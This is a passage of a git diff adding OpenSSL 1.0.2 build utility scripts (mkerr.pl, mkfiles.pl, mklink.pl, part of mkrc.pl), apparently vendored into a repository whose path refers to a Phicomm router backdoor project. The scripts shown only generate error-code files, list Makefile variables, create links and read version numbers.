+	} elsif($arg eq "-write") {
+		$dowrite = 1;
+		shift @ARGV;
+	} elsif($arg eq "-help" || $arg eq "-h" || $arg eq "-?" || $arg eq "--help") {
+		print STDERR <<"EOF";
+mkerr.pl [options] ...
+
+Options:
+
+  -conf F       Use the config file F instead of the default one:
+                  crypto/err/openssl.ec
+
+  -hprefix P    Prepend the filenames in generated #include <header>
+                statements with prefix P. Default: 'openssl/' (without
+                the quotes, naturally)
+
+  -debug        Turn on debugging verbose output on stderr.
+
+  -rebuild      Rebuild all header and C source files, irrespective of the
+                fact if any error or function codes have been added/removed.
+                Default: only update files for libraries which saw change
+                         (of course, this requires '-write' as well, or no
+                          files will be touched!)
+
+  -recurse      scan a preconfigured set of directories / files for error and
+                function codes:
+                  (<crypto/*.c>, <crypto/*/*.c>, <ssl/*.c>, <apps/*.c>)
+                When this option is NOT specified, the filelist is taken from
+                the commandline instead. Here, wildcards may be embedded. (Be
+                sure to escape those to prevent the shell from expanding them
+                for you when you wish mkerr.pl to do so instead.)
+                Default: take file list to scan from the command line.
+
+  -reindex      Discard the numeric values previously assigned to the error
+                and function codes as extracted from the scanned header files;
+                instead renumber all of them starting from 100. (Note that
+                the numbers assigned through 'R' records in the config file
+                remain intact.)
+                Default: keep previously assigned numbers. (You are warned
+                         when collisions are detected.)
+
+  -nostatic     Generates a different source code, where these additional 
+                functions are generated for each library specified in the
+                config file:
+                  void ERR_load_<LIB>_strings(void);
+                  void ERR_unload_<LIB>_strings(void);
+                  void ERR_<LIB>_error(int f, int r, char *fn, int ln);
+                  #define <LIB>err(f,r) ERR_<LIB>_error(f,r,__FILE__,__LINE__)
+                while the code facilitates the use of these in an environment
+                where the error support routines are dynamically loaded at 
+                runtime.
+                Default: 'static' code generation.
+
+  -staticloader Prefix generated functions with the 'static' scope modifier.
+                Default: don't write any scope modifier prefix.
+
+  -write        Actually (over)write the generated code to the header and C 
+                source files as assigned to each library through the config 
+                file.
+                Default: don't write.
+
+  -help / -h / -? / --help            Show this help text.
+
+  ...           Additional arguments are added to the file list to scan,
+                assuming '-recurse' was NOT specified on the command line.
+
+EOF
+		exit 1;
+	} else {
+		last;
+	}
+}
+
+if($recurse) {
+	@source = (<crypto/*.c>, <crypto/*/*.c>, <ssl/*.c>);
+} else {
+	@source = @ARGV;
+}
+
+# Read in the config file
+
+open(IN, "<$config") || die "Can't open config file $config";
+
+# Parse config file
+
+while(<IN>)
+{
+	if(/^L\s+(\S+)\s+(\S+)\s+(\S+)/) {
+		$hinc{$1} = $2;
+		$libinc{$2} = $1;
+		$cskip{$3} = $1;
+		if($3 ne "NONE") {
+			$csrc{$1} = $3;
+			$fmax{$1} = 100;
+			$rmax{$1} = 100;
+			$fassigned{$1} = ":";
+			$rassigned{$1} = ":";
+			$fnew{$1} = 0;
+			$rnew{$1} = 0;
+		}
+	} elsif (/^F\s+(\S+)/) {
+	# Add extra function with $1
+	} elsif (/^R\s+(\S+)\s+(\S+)/) {
+		$rextra{$1} = $2;
+		$rcodes{$1} = $2;
+	}
+}
+
+close IN;
+
+# Scan each header file in turn and make a list of error codes
+# and function names
+
+while (($hdr, $lib) = each %libinc)
+{
+	next if($hdr eq "NONE");
+	print STDERR "Scanning header file $hdr\n" if $debug; 
+	my $line = "", $def= "", $linenr = 0, $gotfile = 0;
+	if (open(IN, "<$hdr")) {
+	    $gotfile = 1;
+	    while(<IN>) {
+		$linenr++;
+		print STDERR "line: $linenr\r" if $debug;
+
+		last if(/BEGIN\s+ERROR\s+CODES/);
+		if ($line ne '') {
+		    $_ = $line . $_;
+		    $line = '';
+		}
+
+		if (/\\$/) {
+		    $line = $_;
+		    next;
+		}
+
+		if(/\/\*/) {
+		    if (not /\*\//) {		# multiline comment...
+			$line = $_;		# ... just accumulate
+			next; 
+		    } else {
+			s/\/\*.*?\*\///gs;	# wipe it
+		    }
+		}
+
+		if ($cpp) {
+		    $cpp++ if /^#\s*if/;
+		    $cpp-- if /^#\s*endif/;
+		    next;
+		}
+		$cpp = 1 if /^#.*ifdef.*cplusplus/;  # skip "C" declaration
+
+		next if (/^\#/);                      # skip preprocessor directives
+
+		s/{[^{}]*}//gs;                      # ignore {} blocks
+
+		if (/\{|\/\*/) { # Add a } so editor works...
+		    $line = $_;
+		} else {
+		    $def .= $_;
+		}
+	    }
+	}
+
+	print STDERR "                                  \r" if $debug;
+        $defnr = 0;
+	# Delete any DECLARE_ macros
+	$def =~ s/DECLARE_\w+\([\w,\s]+\)//gs;
+	foreach (split /;/, $def) {
+	    $defnr++;
+	    print STDERR "def: $defnr\r" if $debug;
+
+	    # The goal is to collect function names from function declarations.
+
+	    s/^[\n\s]*//g;
+	    s/[\n\s]*$//g;
+
+	    # Skip over recognized non-function declarations
+	    next if(/typedef\W/ or /DECLARE_STACK_OF/ or /TYPEDEF_.*_OF/);
+
+	    # Remove STACK_OF(foo)
+	    s/STACK_OF\(\w+\)/void/;
+
+	    # Reduce argument lists to empty ()
+	    # fold round brackets recursively: (t(*v)(t),t) -> (t{}{},t) -> {}
+	    while(/\(.*\)/s) {
+		s/\([^\(\)]+\)/\{\}/gs;
+		s/\(\s*\*\s*(\w+)\s*\{\}\s*\)/$1/gs;	#(*f{}) -> f
+	    }
+	    # pretend as we didn't use curly braces: {} -> ()
+	    s/\{\}/\(\)/gs;
+
+	    if (/(\w+)\s*\(\).*/s) {	# first token prior [first] () is
+		my $name = $1;		# a function name!
+		$name =~ tr/[a-z]/[A-Z]/;
+		$ftrans{$name} = $1;
+	    } elsif (/[\(\)]/ and not (/=/)) {
+		print STDERR "Header $hdr: cannot parse: $_;\n";
+	    }
+	}
+
+	print STDERR "                                  \r" if $debug;
+
+	next if $reindex;
+
+	# Scan function and reason codes and store them: keep a note of the
+	# maximum code used.
+
+	if ($gotfile) {
+	  while(<IN>) {
+		if(/^\#\s*define\s+(\S+)\s+(\S+)/) {
+			$name = $1;
+			$code = $2;
+			next if $name =~ /^${lib}err/;
+			unless($name =~ /^${lib}_([RF])_(\w+)$/) {
+				print STDERR "Invalid error code $name\n";
+				next;
+			}
+			if($1 eq "R") {
+				$rcodes{$name} = $code;
+				if ($rassigned{$lib} =~ /:$code:/) {
+					print STDERR "!! ERROR: $lib reason code $code assigned twice (collision at $name)\n";
+					++$errcount;
+				}
+				$rassigned{$lib} .= "$code:";
+				if(!(exists $rextra{$name}) &&
+					 ($code > $rmax{$lib}) ) {
+					$rmax{$lib} = $code;
+				}
+			} else {
+				if ($fassigned{$lib} =~ /:$code:/) {
+					print STDERR "!! ERROR: $lib function code $code assigned twice (collision at $name)\n";
+					++$errcount;
+				}
+				$fassigned{$lib} .= "$code:";
+				if($code > $fmax{$lib}) {
+					$fmax{$lib} = $code;
+				}
+				$fcodes{$name} = $code;
+			}
+		}
+	  }
+	}
+
+	if ($debug) {
+		if (defined($fmax{$lib})) {
+			print STDERR "Max function code fmax" . "{" . "$lib" . "} = $fmax{$lib}\n";
+			$fassigned{$lib} =~ m/^:(.*):$/;
+			@fassigned = sort {$a <=> $b} split(":", $1);
+			print STDERR "  @fassigned\n";
+		}
+		if (defined($rmax{$lib})) {
+			print STDERR "Max reason code rmax" . "{" . "$lib" . "} = $rmax{$lib}\n";
+			$rassigned{$lib} =~ m/^:(.*):$/;
+			@rassigned = sort {$a <=> $b} split(":", $1);
+			print STDERR "  @rassigned\n";
+		}
+	}
+
+	if ($lib eq "SSL") {
+		if ($rmax{$lib} >= 1000) {
+			print STDERR "!! ERROR: SSL error codes 1000+ are reserved for alerts.\n";
+			print STDERR "!!        Any new alerts must be added to $config.\n";
+			++$errcount;
+			print STDERR "\n";
+		}
+	}
+	close IN;
+}
+
+# Scan each C source file and look for function and reason codes
+# This is done by looking for strings that "look like" function or
+# reason codes: basically anything consisting of all upper case and
+# numerics which has _F_ or _R_ in it and which has the name of an
+# error library at the start. This seems to work fine except for the
+# oddly named structure BIO_F_CTX which needs to be ignored.
+# If a code doesn't exist in list compiled from headers then mark it
+# with the value "X" as a place holder to give it a value later.
+# Store all function and reason codes found in %ufcodes and %urcodes
+# so all those unreferenced can be printed out.
+
+
+foreach $file (@source) {
+	# Don't parse the error source file.
+	next if exists $cskip{$file};
+	print STDERR "File loaded: ".$file."\r" if $debug;
+	open(IN, "<$file") || die "Can't open source file $file\n";
+	while(<IN>) {
+		# skip obsoleted source files entirely!
+		last if(/^#error\s+obsolete/);
+
+		if(/(([A-Z0-9]+)_F_([A-Z0-9_]+))/) {
+			next unless exists $csrc{$2};
+			next if($1 eq "BIO_F_BUFFER_CTX");
+			$ufcodes{$1} = 1;
+			if(!exists $fcodes{$1}) {
+				$fcodes{$1} = "X";
+				$fnew{$2}++;
+			}
+			$notrans{$1} = 1 unless exists $ftrans{$3};
+			print STDERR "Function: $1\t= $fcodes{$1} (lib: $2, name: $3)\n" if $debug; 
+		}
+		if(/(([A-Z0-9]+)_R_[A-Z0-9_]+)/) {
+			next unless exists $csrc{$2};
+			$urcodes{$1} = 1;
+			if(!exists $rcodes{$1}) {
+				$rcodes{$1} = "X";
+				$rnew{$2}++;
+			}
+			print STDERR "Reason: $1\t= $rcodes{$1} (lib: $2)\n" if $debug; 
+		} 
+	}
+	close IN;
+}
+print STDERR "                                  \n" if $debug;
+
+# Now process each library in turn.
+
+foreach $lib (keys %csrc)
+{
+	my $hfile = $hinc{$lib};
+	my $cfile = $csrc{$lib};
+	if(!$fnew{$lib} && !$rnew{$lib}) {
+		print STDERR "$lib:\t\tNo new error codes\n";
+		next unless $rebuild;
+	} else {
+		print STDERR "$lib:\t\t$fnew{$lib} New Functions,";
+		print STDERR " $rnew{$lib} New Reasons.\n";
+		next unless $dowrite;
+	}
+
+	# If we get here then we have some new error codes so we
+	# need to rebuild the header file and C file.
+
+	# Make a sorted list of error and reason codes for later use.
+
+	my @function = sort grep(/^${lib}_/,keys %fcodes);
+	my @reasons = sort grep(/^${lib}_/,keys %rcodes);
+
+	# Rewrite the header file
+
+	if (open(IN, "<$hfile")) {
+	    # Copy across the old file
+	    while(<IN>) {
+		push @out, $_;
+		last if (/BEGIN ERROR CODES/);
+	    }
+	    close IN;
+	} else {
+	    push @out,
+"/* ====================================================================\n",
+" * Copyright (c) 2001-$year The OpenSSL Project.  All rights reserved.\n",
+" *\n",
+" * Redistribution and use in source and binary forms, with or without\n",
+" * modification, are permitted provided that the following conditions\n",
+" * are met:\n",
+" *\n",
+" * 1. Redistributions of source code must retain the above copyright\n",
+" *    notice, this list of conditions and the following disclaimer. \n",
+" *\n",
+" * 2. Redistributions in binary form must reproduce the above copyright\n",
+" *    notice, this list of conditions and the following disclaimer in\n",
+" *    the documentation and/or other materials provided with the\n",
+" *    distribution.\n",
+" *\n",
+" * 3. All advertising materials mentioning features or use of this\n",
+" *    software must display the following acknowledgment:\n",
+" *    \"This product includes software developed by the OpenSSL Project\n",
+" *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)\"\n",
+" *\n",
+" * 4. The names \"OpenSSL Toolkit\" and \"OpenSSL Project\" must not be used to\n",
+" *    endorse or promote products derived from this software without\n",
+" *    prior written permission. For written permission, please contact\n",
+" *    openssl-core\@openssl.org.\n",
+" *\n",
+" * 5. Products derived from this software may not be called \"OpenSSL\"\n",
+" *    nor may \"OpenSSL\" appear in their names without prior written\n",
+" *    permission of the OpenSSL Project.\n",
+" *\n",
+" * 6. Redistributions of any form whatsoever must retain the following\n",
+" *    acknowledgment:\n",
+" *    \"This product includes software developed by the OpenSSL Project\n",
+" *    for use in the OpenSSL Toolkit (http://www.openssl.org/)\"\n",
+" *\n",
+" * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY\n",
+" * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n",
+" * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n",
+" * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR\n",
+" * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n",
+" * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT\n",
+" * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n",
+" * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n",
+" * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n",
+" * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n",
+" * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\n",
+" * OF THE POSSIBILITY OF SUCH DAMAGE.\n",
+" * ====================================================================\n",
+" *\n",
+" * This product includes cryptographic software written by Eric Young\n",
+" * (eay\@cryptsoft.com).  This product includes software written by Tim\n",
+" * Hudson (tjh\@cryptsoft.com).\n",
+" *\n",
+" */\n",
+"\n",
+"#ifndef HEADER_${lib}_ERR_H\n",
+"#define HEADER_${lib}_ERR_H\n",
+"\n",
+"#ifdef  __cplusplus\n",
+"extern \"C\" {\n",
+"#endif\n",
+"\n",
+"/* BEGIN ERROR CODES */\n";
+	}
+	open (OUT, ">$hfile") || die "Can't Open File $hfile for writing\n";
+
+	print OUT @out;
+	undef @out;
+	print OUT <<"EOF";
+/* The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+EOF
+	if($static) {
+		print OUT <<"EOF";
+${staticloader}void ERR_load_${lib}_strings(void);
+
+EOF
+	} else {
+		print OUT <<"EOF";
+${staticloader}void ERR_load_${lib}_strings(void);
+${staticloader}void ERR_unload_${lib}_strings(void);
+${staticloader}void ERR_${lib}_error(int function, int reason, char *file, int line);
+#define ${lib}err(f,r) ERR_${lib}_error((f),(r),__FILE__,__LINE__)
+
+EOF
+	}
+	print OUT <<"EOF";
+/* Error codes for the $lib functions. */
+
+/* Function codes. */
+EOF
+
+	foreach $i (@function) {
+		$z=6-int(length($i)/8);
+		if($fcodes{$i} eq "X") {
+			$fassigned{$lib} =~ m/^:([^:]*):/;
+			$findcode = $1;
+			if (!defined($findcode)) {
+				$findcode = $fmax{$lib};
+			}
+			while ($fassigned{$lib} =~ m/:$findcode:/) {
+				$findcode++;
+			}
+			$fcodes{$i} = $findcode;
+			$fassigned{$lib} .= "$findcode:";
+			print STDERR "New Function code $i\n" if $debug;
+		}
+		printf OUT "#define $i%s $fcodes{$i}\n","\t" x $z;
+	}
+
+	print OUT "\n/* Reason codes. */\n";
+
+	foreach $i (@reasons) {
+		$z=6-int(length($i)/8);
+		if($rcodes{$i} eq "X") {
+			$rassigned{$lib} =~ m/^:([^:]*):/;
+			$findcode = $1;
+			if (!defined($findcode)) {
+				$findcode = $rmax{$lib};
+			}
+			while ($rassigned{$lib} =~ m/:$findcode:/) {
+				$findcode++;
+			}
+			$rcodes{$i} = $findcode;
+			$rassigned{$lib} .= "$findcode:";
+			print STDERR "New Reason code   $i\n" if $debug;
+		}
+		printf OUT "#define $i%s $rcodes{$i}\n","\t" x $z;
+	}
+	print OUT <<"EOF";
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
+EOF
+	close OUT;
+
+	# Rewrite the C source file containing the error details.
+
+	# First, read any existing reason string definitions:
+	my %err_reason_strings;
+	if (open(IN,"<$cfile")) {
+		while (<IN>) {
+			if (/\b(${lib}_R_\w*)\b.*\"(.*)\"/) {
+				$err_reason_strings{$1} = $2;
+			}
+			if (/\b${lib}_F_(\w*)\b.*\"(.*)\"/) {
+				if (!exists $ftrans{$1} && ($1 ne $2)) {
+					print STDERR "WARNING: Mismatched function string $2\n";
+					$ftrans{$1} = $2;
+				}
+			}
+		}
+		close(IN);
+	}
+
+
+	my $hincf;
+	if($static) {
+		$hfile =~ /([^\/]+)$/;
+		$hincf = "<${hprefix}$1>";
+	} else {
+		$hincf = "\"$hfile\"";
+	}
+
+	# If static we know the error code at compile time so use it
+	# in error definitions.
+
+	if ($static)
+		{
+		$pack_errcode = "ERR_LIB_${lib}";
+		$load_errcode = "0";
+		}
+	else
+		{
+		$pack_errcode = "0";
+		$load_errcode = "ERR_LIB_${lib}";
+		}
+
+
+	open (OUT,">$cfile") || die "Can't open $cfile for writing";
+
+	print OUT <<"EOF";
+/* $cfile */
+/* ====================================================================
+ * Copyright (c) 1999-$year The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer. 
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core\@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay\@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh\@cryptsoft.com).
+ *
+ */
+
+/* NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include $hincf
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+#define ERR_FUNC(func) ERR_PACK($pack_errcode,func,0)
+#define ERR_REASON(reason) ERR_PACK($pack_errcode,0,reason)
+
+static ERR_STRING_DATA ${lib}_str_functs[]=
+	{
+EOF
+	# Add each function code: if a function name is found then use it.
+	foreach $i (@function) {
+		my $fn;
+		$i =~ /^${lib}_F_(\S+)$/;
+		$fn = $1;
+		if(exists $ftrans{$fn}) {
+			$fn = $ftrans{$fn};
+		}
+#		print OUT "{ERR_PACK($pack_errcode,$i,0),\t\"$fn\"},\n";
+		print OUT "{ERR_FUNC($i),\t\"$fn\"},\n";
+	}
+	print OUT <<"EOF";
+{0,NULL}
+	};
+
+static ERR_STRING_DATA ${lib}_str_reasons[]=
+	{
+EOF
+	# Add each reason code.
+	foreach $i (@reasons) {
+		my $rn;
+		my $rstr = "ERR_REASON($i)";
+		my $nspc = 0;
+		if (exists $err_reason_strings{$i}) {
+			$rn = $err_reason_strings{$i};
+		} else {
+			$i =~ /^${lib}_R_(\S+)$/;
+			$rn = $1;
+			$rn =~ tr/_[A-Z]/ [a-z]/;
+		}
+		$nspc = 40 - length($rstr) unless length($rstr) > 40;
+		$nspc = " " x $nspc;
+		print OUT "{${rstr}${nspc},\"$rn\"},\n";
+	}
+if($static) {
+	print OUT <<"EOF";
+{0,NULL}
+	};
+
+#endif
+
+${staticloader}void ERR_load_${lib}_strings(void)
+	{
+#ifndef OPENSSL_NO_ERR
+
+	if (ERR_func_error_string(${lib}_str_functs[0].error) == NULL)
+		{
+		ERR_load_strings($load_errcode,${lib}_str_functs);
+		ERR_load_strings($load_errcode,${lib}_str_reasons);
+		}
+#endif
+	}
+EOF
+} else {
+	print OUT <<"EOF";
+{0,NULL}
+	};
+
+#endif
+
+#ifdef ${lib}_LIB_NAME
+static ERR_STRING_DATA ${lib}_lib_name[]=
+        {
+{0	,${lib}_LIB_NAME},
+{0,NULL}
+	};
+#endif
+
+
+static int ${lib}_lib_error_code=0;
+static int ${lib}_error_init=1;
+
+${staticloader}void ERR_load_${lib}_strings(void)
+	{
+	if (${lib}_lib_error_code == 0)
+		${lib}_lib_error_code=ERR_get_next_error_library();
+
+	if (${lib}_error_init)
+		{
+		${lib}_error_init=0;
+#ifndef OPENSSL_NO_ERR
+		ERR_load_strings(${lib}_lib_error_code,${lib}_str_functs);
+		ERR_load_strings(${lib}_lib_error_code,${lib}_str_reasons);
+#endif
+
+#ifdef ${lib}_LIB_NAME
+		${lib}_lib_name->error = ERR_PACK(${lib}_lib_error_code,0,0);
+		ERR_load_strings(0,${lib}_lib_name);
+#endif
+		}
+	}
+
+${staticloader}void ERR_unload_${lib}_strings(void)
+	{
+	if (${lib}_error_init == 0)
+		{
+#ifndef OPENSSL_NO_ERR
+		ERR_unload_strings(${lib}_lib_error_code,${lib}_str_functs);
+		ERR_unload_strings(${lib}_lib_error_code,${lib}_str_reasons);
+#endif
+
+#ifdef ${lib}_LIB_NAME
+		ERR_unload_strings(0,${lib}_lib_name);
+#endif
+		${lib}_error_init=1;
+		}
+	}
+
+${staticloader}void ERR_${lib}_error(int function, int reason, char *file, int line)
+	{
+	if (${lib}_lib_error_code == 0)
+		${lib}_lib_error_code=ERR_get_next_error_library();
+	ERR_PUT_error(${lib}_lib_error_code,function,reason,file,line);
+	}
+EOF
+
+}
+
+	close OUT;
+	undef %err_reason_strings;
+}
+
+if($debug && %notrans) {
+	print STDERR "The following function codes were not translated:\n";
+	foreach(sort keys %notrans)
+	{
+		print STDERR "$_\n";
+	}
+}
+
+# Make a list of unreferenced function and reason codes
+
+foreach (keys %fcodes) {
+	push (@funref, $_) unless exists $ufcodes{$_};
+}
+
+foreach (keys %rcodes) {
+	push (@runref, $_) unless exists $urcodes{$_};
+}
+
+if($debug && @funref) {
+	print STDERR "The following function codes were not referenced:\n";
+	foreach(sort @funref)
+	{
+		print STDERR "$_\n";
+	}
+}
+
+if($debug && @runref) {
+	print STDERR "The following reason codes were not referenced:\n";
+	foreach(sort @runref)
+	{
+		print STDERR "$_\n";
+	}
+}
+
+if($errcount) {
+	print STDERR "There were errors, failing...\n\n";
+	exit $errcount;
+}
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkfiles.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkfiles.pl
new file mode 100755
index 0000000..7d9a9d5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkfiles.pl
@@ -0,0 +1,143 @@
+#!/usr/local/bin/perl
+#
+# This is a hacked version of files.pl for systems that can't do a 'make files'.
+# Do a perl util/mkminfo.pl >MINFO to build MINFO
+# Written by Steve Henson 1999.
+
+# List of directories to process
+
+my @dirs = (
+".",
+"crypto",
+"crypto/md2",
+"crypto/md4",
+"crypto/md5",
+"crypto/sha",
+"crypto/mdc2",
+"crypto/hmac",
+"crypto/cmac",
+"crypto/ripemd",
+"crypto/des",
+"crypto/rc2",
+"crypto/rc4",
+"crypto/rc5",
+"crypto/idea",
+"crypto/bf",
+"crypto/cast",
+"crypto/aes",
+"crypto/camellia",
+"crypto/seed",
+"crypto/modes",
+"crypto/bn",
+"crypto/rsa",
+"crypto/dsa",
+"crypto/dso",
+"crypto/dh",
+"crypto/ec",
+"crypto/ecdh",
+"crypto/ecdsa",
+"crypto/buffer",
+"crypto/bio",
+"crypto/stack",
+"crypto/lhash",
+"crypto/rand",
+"crypto/err",
+"crypto/objects",
+"crypto/evp",
+"crypto/asn1",
+"crypto/pem",
+"crypto/x509",
+"crypto/x509v3",
+"crypto/cms",
+"crypto/conf",
+"crypto/jpake",
+"crypto/txt_db",
+"crypto/pkcs7",
+"crypto/pkcs12",
+"crypto/comp",
+"crypto/engine",
+"crypto/ocsp",
+"crypto/ui",
+"crypto/krb5",
+#"crypto/store",
+"crypto/pqueue",
+"crypto/whrlpool",
+"crypto/ts",
+"crypto/srp",
+"ssl",
+"apps",
+"engines",
+"engines/ccgost",
+"test",
+"tools"
+);
+
+%top;
+
+foreach (@dirs) {
+	&files_dir ($_, "Makefile");
+}
+
+exit(0);
+
+sub files_dir
+{
+my ($dir, $makefile) = @_;
+
+my %sym;
+
+open (IN, "$dir/$makefile") || die "Can't open $dir/$makefile";
+
+my $s="";
+
+while (<IN>)
+	{
+	chop;
+	s/#.*//;
+	if (/^(\S+)\s*=\s*(.*)$/)
+		{
+		$o="";
+		($s,$b)=($1,$2);
+		for (;;)
+			{
+			if ($b =~ /\\$/)
+				{
+				chop($b);
+				$o.=$b." ";
+				$b=<IN>;
+				chop($b);
+				}
+			else
+				{
+				$o.=$b." ";
+				last;
+				}
+			}
+		$o =~ s/^\s+//;
+		$o =~ s/\s+$//;
+		$o =~ s/\s+/ /g;
+
+		$o =~ s/\$[({]([^)}]+)[)}]/$top{$1} or $sym{$1}/ge;
+		$sym{$s}=($top{$s} or $o);
+		}
+	}
+
+print "RELATIVE_DIRECTORY=$dir\n";
+
+foreach (sort keys %sym)
+	{
+	print "$_=$sym{$_}\n";
+	}
+if ($dir eq "." && defined($sym{"BUILDENV"}))
+	{
+	foreach (split(' ',$sym{"BUILDENV"}))
+		{
+		/^(.+)=/;
+		$top{$1}=$sym{$1};
+		}
+	}
+
+print "RELATIVE_DIRECTORY=\n";
+
+close (IN);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mklink.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mklink.pl
new file mode 100755
index 0000000..61db12c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mklink.pl
@@ -0,0 +1,73 @@
+#!/usr/local/bin/perl
+
+# mklink.pl
+
+# The first command line argument is a non-empty relative path
+# specifying the "from" directory.
+# Each other argument is a file name not containing / and
+# names a file in the current directory.
+#
+# For each of these files, we create in the "from" directory a link
+# of the same name pointing to the local file.
+#
+# We assume that the directory structure is a tree, i.e. that it does
+# not contain symbolic links and that the parent of / is never referenced.
+# Apart from this, this script should be able to handle even the most
+# pathological cases.
+
+use Cwd;
+
+my $from = shift;
+my @files = @ARGV;
+
+my @from_path = split(/[\\\/]/, $from);
+my $pwd = getcwd();
+chomp($pwd);
+my @pwd_path = split(/[\\\/]/, $pwd);
+
+my @to_path = ();
+
+my $dirname;
+foreach $dirname (@from_path) {
+
+    # In this loop, @to_path always is a relative path from
+    # @pwd_path (interpreted is an absolute path) to the original pwd.
+
+    # At the end, @from_path (as a relative path from the original pwd)
+    # designates the same directory as the absolute path @pwd_path,
+    # which means that @to_path then is a path from there to the original pwd.
+
+    next if ($dirname eq "" || $dirname eq ".");
+
+    if ($dirname eq "..") {
+	@to_path = (pop(@pwd_path), @to_path);
+    } else {
+	@to_path = ("..", @to_path);
+	push(@pwd_path, $dirname);
+    }
+}
+
+my $to = join('/', @to_path);
+
+my $file;
+$symlink_exists=eval {symlink("",""); 1};
+if ($^O eq "msys") { $symlink_exists=0 };
+foreach $file (@files) {
+    my $err = "";
+    if ($symlink_exists) {
+	unlink "$from/$file";
+	symlink("$to/$file", "$from/$file") or $err = " [$!]";
+    } else {
+	unlink "$from/$file"; 
+	open (OLD, "<$file") or die "Can't open $file: $!";
+	open (NEW, ">$from/$file") or die "Can't open $from/$file: $!";
+	binmode(OLD);
+	binmode(NEW);
+	while (<OLD>) {
+	    print NEW $_;
+	}
+	close (OLD) or die "Can't close $file: $!";
+	close (NEW) or die "Can't close $from/$file: $!";
+    }
+    print $file . " => $from/$file$err\n";
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkrc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkrc.pl
new file mode 100755
index 0000000..0ceadcf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/util/mkrc.pl
@@ -0,0 +1,71 @@
+#!/bin/env perl
+#
+open FD,"crypto/opensslv.h";
+while(<FD>) {
+    if (/OPENSSL_VERSION_NUMBER\s+(0x[0-9a-f]+)/i) {
+	$ver = hex($1);
+	$v1 = ($ver>>28);
+	$v2 = ($ver>>20)&0xff;
+	$v3 = ($ver>>12)&0xff;
+	$v4 = ($ver>> 4)&0xff;
+	$beta = $ver&0xf;
+	$version = "$v1.$v2.$v3";
+	if ($beta==0xf)	{ $version .= chr(ord('a')+$v4-1) if ($v4);	}
+	elsif ($beta==0){ $version .= "-dev";				}
+	else		{ $version .= "-beta$beta";			}
+	last;
+    }
+}
+close(FD);
+
